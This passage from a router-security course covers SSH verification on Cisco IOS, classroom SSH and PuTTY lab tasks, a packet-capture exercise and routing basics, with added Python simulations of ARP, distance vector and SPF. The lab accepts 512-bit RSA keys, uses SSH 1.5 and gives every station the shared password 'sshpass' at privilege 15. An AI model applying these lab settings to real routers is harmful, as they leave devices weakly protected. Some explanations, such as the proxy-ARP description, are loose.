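Run against the weak excerpt, the checker flags Telnet on both VTY ranges and the missing access-class and login local on vty 5 15; the hardened excerpt produces no findings. The checks are deliberately limited to the settings this section describes, so the output maps one-to-one onto the fragments above.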
SSH Verification
On the router, you will want to run some diagnostic commands to find out who is
connected and how. These commands will show you the state of your SSH
connections. There are some differences based on the IOS version you are
running, so note that in the following.
If you are running IOS version 12.1, and you want to see the state of SSH con-
nections, including who is connected, use the command show ip ssh. The
following fragment lists what this command will reveal.
Router#show ip ssh
Connection Version Encryption State Username
0 1.5 3DES 4 SSHUser
Router#
If you are running IOS version 12.2, there are two commands for viewing SSH
information. First is the show ip ssh command, only here it lists the details,
such as time-out and version. The second command is show ssh, and this
shows the user connected. The following fragment shows both commands used,
one after the other, and their result onscreen.
Router#show ip ssh
SSH Enabled - version 1.5
Authentication timeout: 45 secs; Authentication retries: 2
Router#show ssh
Connection Version Encryption State Username
0 1.5 3DES Session Started SSHUser
Router#
INSTRUCTOR TASK 3A-3
Configuring SSH on a Router
Setup: Observe as your instructor performs the SSH configuration on
the LEFT and RIGHT routers.
1. Console in to the LEFT router, and switch to EXEC mode.
2. At the LEFT# prompt, enter conf t to switch to config mode. The
LEFT(config)# prompt should be displayed.
3. Enter ip domain-name left.com to provide a domain name.
4. Enter crypto key generate rsa to create key pairs. When you are prompted
for the number of bits in the modulus, press Enter to accept the default of
512.
5. Enter ip ssh time-out 120 to set the time-out value to 2 minutes.
6. Enter ip ssh authentication-retries 3 to limit the number of unsuccessful
attempts.
7. Enter line vty 0 4 to begin the line configuration. The LEFT(config-line)#
prompt is displayed.
8. Enter transport input ssh to limit the VTY sessions to accept only SSH
connections.
9. Enter login local to provide for local login.
10. Enter exit to return to the LEFT(config)# prompt.
11. Enter username sshl01 privilege 15 password sshpass to assign a user name
and password for student station L01.
Repeat this command to assign user names and passwords for all other
student stations on the left side of the classroom.
12. Enter exit to return to the LEFT# prompt.
13. Enter copy ru st to save the configuration changes. Press Enter to accept
the default file name.
14. Enter exit to return to the LEFT> prompt.
15. Disconnect from the LEFT router, and console in to the RIGHT router.
16. Use the steps listed previously as a guide to set up SSH on the RIGHT
router. Use the domain name right.com, and create user names such as
sshr01, sshr02, and so forth.
17. Disconnect from the RIGHT router, and close the console.
18. Try to Telnet to either of the ssh-enabled routers, and ask students to do
the same. None of the attempts should be successful, as you have blocked
Telnet connections on both routers.
Client Configuration to use SSH
Just as there was some configuration required on the server, some configuration is
needed on the client side to run SSH. However, the configuration on the client is
not nearly as complex. In general, a client SSH application must be installed, and
the client must be configured to use the application in communication with the
router. There are several SSH client programs available, and in this example, the
PuTTY program is used. Figure 3-1 shows an example of the settings for this
application.
Figure 3-1: The client configuration for an SSH session.
During the conguration, you will be asked to provide input on the cryptography
used, and you will select RSA. Additionally, you will be required to present
proper credentials when connecting, meaning the local username on the router
and the password. Once you enter the proper credentials, you will have secure
access, and operation will be no different than using Telnet.
TASK 3A-4
Configuring the SSH Client
Setup: You are logged on to Windows Server 2003 as the renamed
Administrator account. The routers have a limited number of
simultaneous logins, so you might need to take turns accessing
the routers if your class has many students in it.
1. Navigate to the putty.exe file located in C:\Tools\Lesson3.
2. Double-click putty.exe.
3. For Host Name, enter the IP address for your router. Your instructor will
provide the router IP addresses. The router you use is named LEFT or
RIGHT, based on your location in the classroom.
4. Click SSH (Port 22).
5. Click Open to initiate the connection.
Provide students with the location of the PuTTY installation program.
Provide students with the IP addresses for the LEFT and RIGHT routers.
6. When you are prompted, click Yes to accept the key, and click Yes to
continue the connection. Press Enter to display the login prompt.
7. Enter your ssh user name, such as sshl01. You should be prompted for a
password.
8. Enter sshpass to complete the login sequence.
9. After authentication has taken place, log out and close PuTTY.
Topic 3B
Routing Principles
To be able to secure your routers and routed networks, you need to understand
some basic principles related to routing in general. Let's begin by looking at how
routers and routing fit into the OSI Model.
The ARP Process
Most people are aware that routers function at the Network layer, but that
statement must be understood precisely: routers route at the Network layer.
Routers are affected by and operate at other layers as well, including the Data
Link layer.
The OSI model is the foundation of all network communication. Routers fit into
the OSI model just as other devices do, with their primary functionality being at
the Network layer. In this lesson, the vast majority of the content will be focusing
on the Network layer; however, there are important areas of the Data Link layer
that must be investigated as well.
MAC addresses are split into two parts, each containing six hexadecimal digits.
The first six digits represent the vendor code (manufacturer indicator) or OUI
(Organizationally Unique Identifier), and the second six are left for definition by
the vendor and are often used as a serial number. These 48-bit numbers are
designed to be globally unique, meaning that there is only one NIC with a given
MAC address on the entire planet.
ARP (RFC 826) is used to make the connection between the Layer Two and
Layer Three addresses. ARP is used in the following examples of data moving
from one host to another.
Note: The IEEE (Institute of Electrical and Electronic Engineers) issues MAC
addresses to network hardware vendors to ensure that MAC addresses remain
unique.
Note: Layer Two addresses are used to get data packets from one local node to
another local node, while Layer Three addresses are used to get data packets
from one network to another network.
The first example shows data moving from node 1 to node 2 on a local network
segment. In order for the data to arrive properly, the following steps must occur:
1. Node 1 (knowing the Network layer address of node 2) sends a local
broadcast on the LAN indicating that Node 1 wishes to learn the Data Link
address for Node 2.
2. Since Node 1 sent a broadcast, all nodes on the local segment receive and
process the request, discarding it when they identify that the broadcast was
not intended for them.
3. Node 2 identifies the message requesting its MAC address and responds by
sending its Data Link address. Node 2 also stores the MAC address of Node
1 for future use.
4. Node 1 sends the packet directly to the Data link address of Node 2.
Figure 3-2 shows this process between Node 1 and Node 2 on the same segment.
Figure 3-2: This example shows the process of a local ARP broadcast between two nodes.
To take this concept a bit further, let's look at the process of MAC address
resolution if Node 2 is not on the local segment (see Figure 3-3). In order for
communication to take place between Nodes 1 and 2, the following steps must
occur:
1. Node 1 determines that it needs to communicate with Node 2. As with all
TCP/IP communication, Node 1 ANDs its IP address with its subnet mask,
then it ANDs Node 2's IP address with the Node 1 subnet mask.
2. Node 1 compares the results of the two AND processes to determine if they
are the same (meaning that the nodes are on the same network) or
different (meaning that the nodes are on different networks). In this example,
the results are different, so Node 1 can conclude that Node 2 is situated on a
different network than Node 1.
3. If Node 1's TCP/IP stack is configured with a Default Gateway, Node 1 will
use ARP resolution for the Default Gateway address, as explained in the
previous example (because Node 1's Default Gateway will most likely be on
the same network as Node 1), and store the Default Gateway address as the
address to use for reaching Node 2.
Note: If a Default Gateway is not configured for Node 1, then Node 1 will not be
able to communicate with Node 2. In fact, if a Default Gateway is not configured
and Node 1 attempts to ping Node 2, it should receive a message stating that the
destination host is unreachable. For a ping to be successful across a routed
network such as the one in this example, Node 2 should also have an appropriate
Default Gateway in its IP configuration. If Node 2 exists but is not configured with
a Default Gateway, and if Node 1 attempts to ping Node 2, Node 1 should receive a
message stating that the request timed out.
Figure 3-3: This example shows the process of a router returning the ARP request of a
remote node.
These examples are geared towards TCP/IP as a protocol, and we will use
TCP/IP throughout this lesson. IP addressing is the primary example of Network
layer addressing used today.
LAN-to-LAN Routing Process
The process of moving data from one host to another and from LAN to LAN is
not complex. In the example shown in Figure 3-4, there is one router connecting
two networks. There are two hosts defined, one on either network, using TCP/IP.
Figure 3-4: Two networks connected by a single router.
From this diagram, you can see the networks are connected via a single router.
Both interfaces are Ethernet interfaces, and the IP addresses are given. In this
example, node 7 is trying to get a packet to node 10. Since the nodes are in
different networks, the packet will need to be routed to reach its goal.
An Ethernet packet will be generated at Node 7 with the IP source address as
10.0.10.115 and the source MAC address as Node 7. The destination IP address
will be 20.0.20.207 with the destination MAC address still unknown.
When the router hears the request for the MAC address of host 20.0.20.207, it
replies to node 7 with its MAC address. Node 7 then sends the packet to the
router with a destination IP address of 20.0.20.207 and the MAC address of the
E0 interface of the router.
Once the router receives the packet, it in turn sends a broadcast for the MAC
address of 20.0.20.207. Node 10 responds to this request, and the router receives
the response. A new packet is then generated by the router, addressed to IP
address 20.0.20.207 from IP address 10.0.10.115 with the source MAC address of
the router, and destination MAC address of Node 10. Node 10 receives the packet
and responds, following the same steps.
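The two procedures above, the ARP decision a node makes after comparing the AND results (including the no-gateway case from the Note) and the LAN-to-LAN process in which the router in turn ARPs for Node 10 on its own segment, as one added Python simulation. This is not code from the course or from Cisco: the two segments are built from Figure 3-4's node addresses, while the router interface addresses 10.0.10.1 and 20.0.20.1, the /24 masks and every MAC address are assumptions made for the example.

```python
import ipaddress

# Constructed example network based on Figure 3-4: Node 7 (10.0.10.115) and
# Node 10 (20.0.20.207) on two Ethernet segments joined by one router.
# Router interface addresses, /24 masks and all MAC addresses are assumptions.
ROUTER_E0 = "10.0.10.1"
ROUTER_E1 = "20.0.20.1"
SEGMENT_10 = {            # who answers an ARP request on the 10.0.10.0 wire
    "10.0.10.115": "00:07:07:07:07:07",   # Node 7
    ROUTER_E0:     "00:0c:00:00:00:e0",   # router interface E0
}
SEGMENT_20 = {            # who answers an ARP request on the 20.0.20.0 wire
    ROUTER_E1:     "00:0c:00:00:00:e1",   # router interface E1
    "20.0.20.207": "00:10:10:10:10:10",   # Node 10
}


def anded(ip, mask):
    """Bitwise AND of an address with a subnet mask: the network portion."""
    return int(ipaddress.IPv4Address(ip)) & int(ipaddress.IPv4Address(mask))


def same_network(ip_a, ip_b, mask):
    """Steps 1 and 2 of the remote-node example: AND both addresses, compare."""
    return anded(ip_a, mask) == anded(ip_b, mask)


def arp_broadcast(target_ip, segment):
    """Every node on the segment sees the request; only the owner replies."""
    for node_ip, node_mac in segment.items():
        if node_ip == target_ip:
            return node_mac
    return None


def resolve(src_ip, mask, dst_ip, segment, default_gateway=None):
    """Decide what the sender ARPs for; return (status, arp_target, dst_mac)."""
    if same_network(src_ip, dst_ip, mask):
        target = dst_ip                     # local: ARP for the destination
    elif default_gateway is None:
        return ("unreachable", None, None)  # the Note's 'destination host unreachable'
    else:
        target = default_gateway            # remote: ARP for the gateway instead
    mac = arp_broadcast(target, segment)
    if mac is None:
        return ("no-arp-reply", target, None)
    return ("local" if target == dst_ip else "via-gateway", target, mac)


def trace_lan_to_lan(src_ip, dst_ip, mask="255.255.255.0"):
    """Frames at each hop for Node 7 -> Node 10: the IP addresses never change,
    while the MAC addresses are rewritten at the router."""
    frames = []
    # Hop 1: Node 7 finds 20.0.20.207 is remote and ARPs for its gateway (E0).
    status, _, dst_mac = resolve(src_ip, mask, dst_ip, SEGMENT_10, ROUTER_E0)
    if status != "via-gateway":
        return frames
    frames.append({"ip_src": src_ip, "ip_dst": dst_ip,
                   "src_mac": SEGMENT_10[src_ip], "dst_mac": dst_mac})
    # Hop 2: the router, out E1, finds 20.0.20.207 is local and ARPs for it.
    status, _, dst_mac = resolve(ROUTER_E1, mask, dst_ip, SEGMENT_20)
    if status != "local":
        return frames
    frames.append({"ip_src": src_ip, "ip_dst": dst_ip,
                   "src_mac": SEGMENT_20[ROUTER_E1], "dst_mac": dst_mac})
    return frames


if __name__ == "__main__":
    for frame in trace_lan_to_lan("10.0.10.115", "20.0.20.207"):
        print(frame)
```

resolve() returns the status and the address that was ARPed for, so the two frames produced by trace_lan_to_lan() show what the passage states: the IP header is identical on both segments while each frame carries the MACs of the wire it is on. Passing no default gateway reproduces the 'destination host unreachable' case from the Note, and the same function applied to the Task 3B-1 addresses (172.16.10.1 pinging 172.17.10.1 or 172.18.10.1 through one gateway) gives the router's MAC as the destination in both cases.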
LAN-to-WAN Routing Process
The LAN-to-WAN routing process is not much different from the previous
example; there are simply more steps involved, and the packet may change
encapsulations along the way from Ethernet to something else and back to
Ethernet. In the example shown in Figure 3-5, there is a routed network with two
LANs connected via multiple routers in a WAN configuration.
Figure 3-5: Two end nodes connected over multiple routers in a WAN configuration.
For a packet to get from Node 7 to Node 10 in this configuration, there are
several steps that must happen:
1. Node 7 creates a request for the MAC address of node 50.0.50.150.
2. The router connected to Network 10.0.10.0 sees this request, and realizes it
is the path to the destination network. It replies to Node 7 with its MAC
address.
3. Node 7 creates a packet with the source IP address of 10.0.10.115 and the
destination IP address of 50.0.50.150 and a source MAC of Node 7 and
destination MAC of the network 10.0.10.0 router.
4. As the local router forwards the packet, the IP source and destination
addresses do not change. The encapsulation may change to fit the wire, for
example to PPP or Frame Relay.
5. The packet is sent from one router to another; at no hop do the IP
addresses change.
6. Once the packet reaches the router for segment 50.0.50.0, the encapsulation
is removed, and you are left with an Ethernet packet with source IP address
10.0.10.115 and destination IP address 50.0.50.150, and source MAC of the
local E0 interface of the local router and destination MAC address of Node
10.
TASK 3B-1
Performing IP and MAC Analysis
Setup: You are logged on to Windows Server 2003 as the renamed
Administrator account.
1. Navigate to C:\Tools\Lesson3 and open ping-arp-mac.cap. The file should
open in Network Monitor.
2. Quickly scroll through the main capture, noting the frames and their
functions. You will see it is a capture of an initial ARP process, then two
consecutive pings (Echo and Echo:Reply) packets.
3. Expand Frame Four.
4. Record the source and destination IP addresses and the source and
destination MAC addresses here:
Source IP address: 172.16.10.1
Destination IP address: 172.17.10.1
Source MAC address: 00 D0 09 7F 0D 73
Destination MAC address: 00 00 0C 8D B8 54
If you need to, expand IP and Ethernet so that you can see the addresses.
5. Expand Frame Five, and record those IP and MAC addresses as well.
Source IP address: 172.17.10.1
Destination IP address: 172.16.10.1
Source MAC address: 00 00 0C 8D B8 54
Destination MAC address: 00 D0 09 7F 0D 73
6. Observe that, when pinging 172.17.10.1 from 172.16.10.1, the destination
MAC address is 00000C8DB854.
7. Examine the exchanges in frames 6 and 7, 8 and 9, and 10 and 11 to see
the ping process complete.
8. Expand Frame Twelve, and record those IP and MAC addresses as well.
Source IP address: 172.16.10.1
Destination IP address: 172.18.10.1
Source MAC address: 00 D0 09 7F 0D 73
Destination MAC address: 00 00 0C 8D B8 54
9. Expand Frame Thirteen, and record those IP and MAC addresses as
well.
Source IP address: 172.18.10.1
Destination IP address: 172.16.10.1
Source MAC address: 00 00 0C 8D B8 54
Destination MAC address: 00 D0 09 7F 0D 73
10. Observe that when pinging 172.18.10.1 from 172.16.10.1, the destination
MAC address is 00000C8DB854.
11. Examine the exchanges in frames 14 and 15, 16 and 17, and 18 and 19
to see the ping process complete.
12. Close the capture file, and leave Network Monitor open.
The Routing Process
Figure 3-6 shows a complex network, with many possible paths for the data to
take across the network. The routers will have to communicate with each other in
order to determine the path for the given situation.
Figure 3-6: Potential paths that data can take to get from one node to another.
In order for the routers to exchange their data, they must have mutual paths of
communication. These paths are the actual connections between the routers. By
using logical addressing, the routers are able to have defined networks to transmit
data on. The logical addressing minimizes the use of broadcasting, with the end
result being more bandwidth for data transmission. In Figure 3-7, each segment
with a letter is a unique Layer Three network segment.
Figure 3-7: Logical network addressing used in an internetwork.
The routers will use the information about the paths to which they are connected,
including the type of connection and available bandwidth, to determine the routes
for data to take. For example, the routers might now say for a packet to get from
network A to network N that the packet should take network A to network B to
network D to network H to network J to network K to network M to network N.
There are many times when the fastest route is not a straight path!
Static and Dynamic Routing
In order for the router to be able to make decisions on where data should go, it
needs to consult its routing table. The routing table is the list of available
networks and the paths to reach those networks. (Routing tables will be discussed
in detail in the next topic.)
Every time a packet reaches a router, the router needs to review the routing table
to determine the appropriate path for the packet. The router must be aware of the
other potential networks and the way to reach these networks.
Static Routes
The creation of these paths can happen either dynamically (automatically) or
statically (manually). The first of these two concepts, static routing, is defined
here.
A static route is a route that has been manually entered into the router to define
the path to the remote network. Although its use is not desirable for every
situation, static routing has many advantages, such as:
Precise control over the routes data will take across the network.
Easy to configure in small networks.
Reduced bandwidth use, because no routing-update traffic is generated.
Reduced load on the routers, because no complex routing calculations are
needed.
Figure 3-8 shows a simple network configuration with two routers and their
defined networks.
Figure 3-8: Two routers, Finance and Marketing, and the networks they connect.
The configuration fragments for the static routes of the above routers look like
the following:
MarketingRouter#config terminal
MarketingRouter(config)#ip route 10.0.10.0 255.255.255.0 20.0.20.1
MarketingRouter(config)#^Z
MarketingRouter#
FinanceRouter#config terminal
FinanceRouter(config)#ip route 30.0.30.0 255.255.255.0 20.0.20.2
FinanceRouter(config)#^Z
FinanceRouter#
Dynamic Routes
From the previous example, you can see that the command syntax and time to
enter the static routes is not complex and will not take a lot of time. However,
the previous example is a very small, simple network, and it is because of its
simplicity that static routes will work.
When the networks become more complex, static routing is not always a
reasonable option. If there were a dozen routers, for example, each connected to
several networks, static routing would become much more complex.
This is where dynamic routing enters the equation. Dynamic routing protocols
can change the configuration of the network when a link goes down. Dynamic
routing protocols can converge to be sure that all routers have a consistent view
of the network. And, dynamic routing protocols have the means to calculate the
best path through an internetwork.
Dynamic routing protocols use mathematical algorithms to determine routes and
communicate with one another. These same routers exchange their information at
defined intervals, and these updates are used to make decisions on routes to take
and reconfiguration, when required.
Because the routers are exchanging this data frequently, they are able to change
paths and update as needed. This flexibility is what makes dynamic routing
protocols so desirable. If a router goes down somewhere in the network, the
remaining routers will reconfigure and find a way for the data to reach the other
side of the network. An example of this is shown in Figure 3-9.
Figure 3-9: There are several routers and multiple paths data can take across this
internetwork.
In the event that Finance Router 2 goes offline, and these routers are using
dynamic routing, the other routers will reconfigure themselves to use only the
other Finance Router. When the offline router comes back online, the other
routers in the network will reconfigure themselves accordingly.
Comparing Routed Protocols and Routing Protocols
One area where people tend to have confusion when dealing with routers is the
difference between routed protocols and routing protocols. They are distinctly
different. In this section, you will learn to differentiate between the two and draw
the boundaries clearly around them so that you can easily and quickly identify
one or the other.
What are Routed Protocols?
For a protocol to be considered a routed protocol, it must have the following
characteristics:
It must contain Network-layer addressing information.
It must have a method of locating a single host on a given network.
Routed protocols are those that carry the addressing information needed to
move user data between and across networks. The routed protocols have
enough internal information to define the structure and function of the
various fields inside a given packet.
The most common routed protocol of today (and of the last decade) is the
Internet Protocol, or IP. Other routed protocols are Novell's IPX/SPX (Microsoft's
version of IPX/SPX is NWLink), and AppleTalk. TCP/IP, IPX/SPX, and
AppleTalk all allow for addressing at the Network layer of the OSI model.
What are Routing Protocols?
While a routed protocol is used to carry data from one host to another, a routing
protocol is used to carry data from one network to another, across multiple
routers. The routing protocol is also the method of transmitting the routing
updates and messages between routers.
Routers will use their assigned routing protocols to create, maintain, and
exchange routing data. The routers can use the same routing protocols to actually
forward the data packets from one network to another, including the decisions on
which path is the best path to take for the data.
These routing protocols can also be used by routers to learn the status and
configurations of networks they are not directly connected to. In addition to
learning about other remote networks, the routers will use their routing protocols
to tell remote routers about networks that the remote router is not directly
connected to.
Regardless of the routing protocol chosen, the routers must have consistent and
open communication between each other in order to maintain a reliable picture,
or map, of the network. It is this map of the network that all the routers will use
to assist in forwarding data packets from network to network.
Some examples of routing protocols are RIP (Routing Information Protocol),
IGRP (Interior Gateway Routing Protocol), and OSPF (Open Shortest Path First).
Whether the protocol used is RIP, IGRP, or OSPF, it is important to consider that
there is no actual end-user data carried by the routing protocol messages. The
user data is carried by the routed protocol.
The Routing Protocols
The last area to cover in this topic is the actual protocols themselves. Here, we
will discuss the common types of protocols, and look at some examples of the
protocols in action. The two common types of protocols are Distance Vector and
Link-State.
Regardless of whether the protocol is Distance Vector or Link-State, for dynamic
routing to function, two critical router functions must exist:
An updated and consistent routing table.
Scheduled updates between routers.
For the routing protocols to perform these two critical processes, they must
conform to a given set of rules. These rules are part of the operation of the routing
protocol. Examples of what rules these protocols can define include:
The frequency of updates between routers.
The amount of data contained in the updates.
The process of finding proper recipients of the router data.
Calculation of the different data paths, and ultimately choosing the most efficient
one based on the given protocol, requires a dened formula. The formula in the
case of routers is known as a routing algorithm.
The routing algorithm is responsible for the actual calculation that determines the
path the data will take as it moves throughout the network. To make this
calculation, the algorithm uses certain variables to create what is known as a
metric. The metric is then what is used in path determination.
Some of the variables that are used to create the overall metric of a given path are:
Hop Count: This is the number of routers that a data packet must go through
to reach its destination. The rule is that the fewer the hops, the shorter the
distance the data has to travel, and therefore the better the path.
Cost: The cost of a link can be defined by the administrator or calculated by
the router. Generally, the lower the cost, the faster the route.
Bandwidth: This variable is defined by the overall bandwidth that the link
provides.
MTU (Maximum Transmission Unit): The MTU is the largest message size
(in octets) that a link will route.
Load: This variable is based on the amount of work the CPU has to perform,
and the number of packets the CPU must analyze and make calculations on.
Regardless of the routing protocol chosen, there is no single rule for selecting the
best protocol based on its algorithm. The routing protocol must change to adapt
to the network in the event there are network changes, and both Distance Vector
and Link-State have this ability. When the routers change their tables based on
this update information from the routing protocol, this is called convergence.
When all routers have the same view of the network, the network is converged.
It is the goal of all routing protocols to have fast convergence, so that the routers
maintain a consistent view of the routes available to network segments, and do
not use incorrect data to make routing decisions.
metric: A random variable x representing a quantitative measure accumulated
over a period.
Distance Vector Routing
Distance Vector routing calculates the distance to a given network segment and
the direction (or vector) required to reach the segment. The algorithm of Distance
Vector (Bellman-Ford) is designed to pass the routing table from neighbor to
neighbor. The passing of the routing table is called the update between routers. In
the event there is a topology change, as a router goes offline, an update will be
sent immediately from one router to another.
Figure 3-10: Routers passing the routing table.
In Distance Vector routing, the routing table is passed between routers along the
shared segments. In Figure 3-10, Router A and Router B will share their routing
tables over the segment between them, out Interface E2 of Router A and out of
Interface E0 of Router B.
When the routers receive an update, they add any new information on how to get
to new routes, or better paths (lower hop counts) to known routes. The algorithm
adds one hop to the hop count for every hop that must be crossed to reach the
destination. Figure 3-11 shows a basic routing table with hop count included.
Figure 3-11: A routing table with interfaces dened and hop counts.
In this example, the routing table has been created, and convergence has been
achieved. Both routers have a consistent view of the network, and the routing
tables define the path to the networks and the interface to forward packets out to
reach the required destinations.
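The update-and-add-one-hop behaviour described above, as an added Python model that is not part of the course text. The topology (routers A, B and C in a line, with the interface names, LAN and transit segment addresses) is constructed for the example; each round every router passes its whole table to its neighbours, the receiver adds one hop, and the network counts as converged when a round changes nothing.

```python
from typing import Dict, Tuple

INFINITY = 16  # RIP's "unreachable" hop count (RFC 1058); bounds any runaway count

# Constructed topology (hypothetical): three routers in a line, A - B - C.
# LINKS[r][n] is the interface on router r that faces neighbour n.
LINKS = {
    "A": {"B": "E2"},
    "B": {"A": "E0", "C": "E1"},
    "C": {"B": "E0"},
}
LANS = {"A": "10.1.0.0", "B": "10.2.0.0", "C": "10.3.0.0"}      # each router's local LAN
TRANSIT = {("A", "B"): "10.12.0.0", ("B", "C"): "10.23.0.0"}   # router-to-router segments

# A routing table maps network -> (hop count, outgoing interface)
Table = Dict[str, Tuple[int, str]]


def initial_tables() -> Dict[str, Table]:
    """Before any update, a router knows only its directly connected segments (0 hops)."""
    tables: Dict[str, Table] = {}
    for r in LINKS:
        tables[r] = {LANS[r]: (0, "local")}
        for (x, y), net in TRANSIT.items():
            if r in (x, y):
                tables[r][net] = (0, "local")
    return tables


def exchange(tables: Dict[str, Table]) -> Tuple[Dict[str, Table], bool]:
    """One update round: every router passes its whole table to each neighbour.
    The receiver adds one hop and keeps the route only if it is new or has a lower count."""
    new = {r: dict(t) for r, t in tables.items()}
    changed = False
    for sender, neighbours in LINKS.items():
        for receiver in neighbours:
            in_iface = LINKS[receiver][sender]          # interface the update arrived on
            for net, (hops, _) in tables[sender].items():
                candidate = min(hops + 1, INFINITY)
                current = new[receiver].get(net)
                if current is None or candidate < current[0]:
                    new[receiver][net] = (candidate, in_iface)
                    changed = True
    return new, changed


def converge(max_rounds: int = 10) -> Tuple[Dict[str, Table], int]:
    """Repeat updates until a round changes nothing; that round number is when the
    network is converged (every router holds the same view of all five segments)."""
    tables = initial_tables()
    for rnd in range(1, max_rounds + 1):
        tables, changed = exchange(tables)
        if not changed:
            return tables, rnd
    return tables, max_rounds


if __name__ == "__main__":
    final, rounds = converge()
    for router, table in final.items():
        print(router, sorted(table.items()))
    print("converged after", rounds, "rounds")
```

Router A learns C's LAN only in the second round (two hops, out E2), which is why a chain of n routers needs about n rounds of updates before every table agrees; the model has no split horizon or route poisoning, so it shows convergence after a link comes up, not the behaviour after a link fails.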
topology: The map or plan of the network. The physical topology describes how the wires or cables are laid out, and the logical or electrical topology describes how the information flows.
Link-State Routing
Where Distance Vector routing uses hop counts to make the decisions in the routing
table on path determination, Link-State routing uses a more complex metric
system. In Link-State routing, all routers maintain a consistent view of the network,
as they do in Distance Vector routing, but they also are all aware of the
complete network topology.
The Link-State routers know each network segment, and the different options for
reaching each segment. Convergence is just as critical in Link-State routing, and
in order to have a converged network, there are steps that must be followed. Figure
3-12 shows a complex network, and after the diagram, the steps for
convergence will be outlined.
Figure 3-12: In this complex network, 7 routers and 14 network segments are defined.
The steps for network convergence are as follows:
1. The routers identify the routers that are their direct neighbors. For example,
Router 3 will identify Router 6 and Router 4 as neighbors.
2. The routers send LSPs (Link State Packets) to the network. The LSPs contain
data on which networks the router can reach. For example, Router 7 would
send LSPs indicating that Router 7 is connected to segments 10.0.0.0, 11.0.0.0,
12.0.0.0, and 14.0.0.0.
3. The routers in the network accept all the LSPs and build a topology database
of the network. The LSPs from all routers are used to build this consistent
view.
4. The SPF (Shortest Path First) algorithm is used to determine the accessibility
of each network and the shortest path between networks. The SPF algorithm
is executed on all routers, so that they all end up with the same topology
view of the network. Each router knows the best path to every segment.
5. The router uses the SPF calculations to determine the best (shortest) path for
reaching each destination network on the internetwork.
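Steps 3 to 5 above, as an added Python example that is not from the course: every router's LSP goes into one shared topology database, SPF (Dijkstra's algorithm) is run from a chosen router, and the result is a table of best cost and first hop for every segment. The four-router topology, link costs and segment addresses are constructed for the example and do not reproduce Figure 3-12; the consistency check on the database is an added assumption about what a sensible implementation would do when two routers disagree about a link.

```python
import heapq
from typing import Dict, Optional, Tuple

# Constructed LSPs (hypothetical): each router advertises its neighbours with a link
# cost and the segments attached to it.
LSPS = {
    "R1": {"neighbors": {"R2": 1, "R3": 5}, "segments": ["10.0.0.0"]},
    "R2": {"neighbors": {"R1": 1, "R3": 1, "R4": 4}, "segments": ["11.0.0.0"]},
    "R3": {"neighbors": {"R1": 5, "R2": 1, "R4": 1}, "segments": ["12.0.0.0"]},
    "R4": {"neighbors": {"R2": 4, "R3": 1}, "segments": ["13.0.0.0"]},
}
# Constructed inconsistent LSPs: R1 claims the R1-R3 link costs 7 while R3 says 5.
BAD_LSPS = {**LSPS, "R1": {"neighbors": {"R2": 1, "R3": 7}, "segments": ["10.0.0.0"]}}


def build_topology_db(lsps) -> Dict[str, Dict[str, int]]:
    """Step 3: accept all LSPs and build the database every router will share.
    A link must be advertised with the same cost from both ends, otherwise the
    routers would not end up with the same view."""
    db = {router: dict(lsp["neighbors"]) for router, lsp in lsps.items()}
    for a, neighbours in db.items():
        for b, cost in neighbours.items():
            if db.get(b, {}).get(a) != cost:
                raise ValueError(f"inconsistent LSPs for link {a}-{b}")
    return db


def lsps_consistent(lsps) -> bool:
    try:
        build_topology_db(lsps)
        return True
    except ValueError:
        return False


def spf(db, root: str) -> Dict[str, Tuple[int, Optional[str]]]:
    """Step 4: Dijkstra from root. Returns {router: (total cost, first-hop router)}."""
    result: Dict[str, Tuple[int, Optional[str]]] = {}
    heap = [(0, root, None)]
    while heap:
        cost, node, first_hop = heapq.heappop(heap)
        if node in result:                    # already settled with a lower cost
            continue
        result[node] = (cost, first_hop)
        for nbr, link_cost in db[node].items():
            if nbr not in result:
                hop = nbr if node == root else first_hop
                heapq.heappush(heap, (cost + link_cost, nbr, hop))
    return result


def routing_table(lsps, root: str) -> Dict[str, Tuple[int, Optional[str]]]:
    """Step 5: the best path to a segment is the best path to the router that owns it."""
    paths = spf(build_topology_db(lsps), root)
    table = {}
    for router, lsp in lsps.items():
        for segment in lsp["segments"]:
            table[segment] = paths[router]
    return table


if __name__ == "__main__":
    for router in LSPS:
        print(router, routing_table(LSPS, router))
```

From R1 the direct R1-R3 link (cost 5) loses to the two-hop path through R2 (cost 2), which is the point of a metric richer than hop count: the path with more hops is preferred because its links are cheaper.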
Common Protocols
Here is a quick list of common routing protocols used on Cisco routers:
RIP (Routing Information Protocol) is a Distance-Vector protocol that uses
hop count as its metric.
IGRP (Interior Gateway Routing Protocol) is a routing protocol that uses a
combined metric for routing decisions.
EIGRP (Enhanced Interior Gateway Routing Protocol) is an enhanced ver-
sion of IGRP that combines properties of Link-State and Distance Vector
protocols.
OSPF (Open Shortest Path First) is a Link-State protocol that commonly
replaces RIP in growing internetworks.
BGP (Border Gateway Protocol) is an interdomain routing protocol often
used by Internet Service Providers.
RTMP (Routing Table Maintenance Protocol) is Apple's routing protocol.
RTMP routers dynamically update topology changes in the network.
Administrative Distances
As the router has the ability to use static routes, dynamic routes, and multiple
protocols, the ability to see the current routing table becomes even more critical
as the network's complexity increases.
There is a function in the router called administrative distance. The administrative
distance function has one obvious use, and that is managing when two or more
methods in the router are aware of a path to a destination. For example, if you
entered a static route on how to get to a location, then RIP identified a route to
that location, which route should the router use?
This is where the administrative distance comes into play. The lower a value, the
higher the level of trust the router places in that route. Some default administrative
distances are listed in the following table.
Route Type Distance
Directly connected interface 0
Static route 1
IGRP route 100
OSPF route 110
RIP route 120
Therefore, if you had a static route and a RIP route, the static route would be the
preferred route that the router uses. When viewing the routing table, not only will
you be shown the current routes to destination networks, but you will also see the
method used. The following configuration fragments show a portion of the routing
tables for three routers in a network:
LEFT#show ip route
R 192.168.10.0/24 [120/1] via 192.168.20.2, 00:00:13, Serial1
C 192.168.20.0/24 is directly connected, Serial1
C 172.16.0.0/16 is directly connected, Ethernet0
R 172.17.0.0/16 [120/1] via 192.168.20.2, 00:00:13, Serial1
R 172.18.0.0/16 [120/2] via 192.168.20.2, 00:00:13, Serial1
CENTER#show ip route
C 192.168.10.0/24 is directly connected, Serial1
C 192.168.20.0/24 is directly connected, Serial0
R 172.16.0.0/16 [120/1] via 192.168.20.1, 00:00:13, Serial0
C 172.17.0.0/16 is directly connected, Ethernet0
R 172.18.0.0/16 [120/1] via 192.168.10.1, 00:00:18, Serial1
RIGHT#show ip route
C 192.168.10.0/24 is directly connected, Serial0
R 192.168.20.0/24 [120/1] via 192.168.10.2, 00:00:20, Serial0
R 172.16.0.0/16 [120/2] via 192.168.10.2, 00:00:20, Serial0
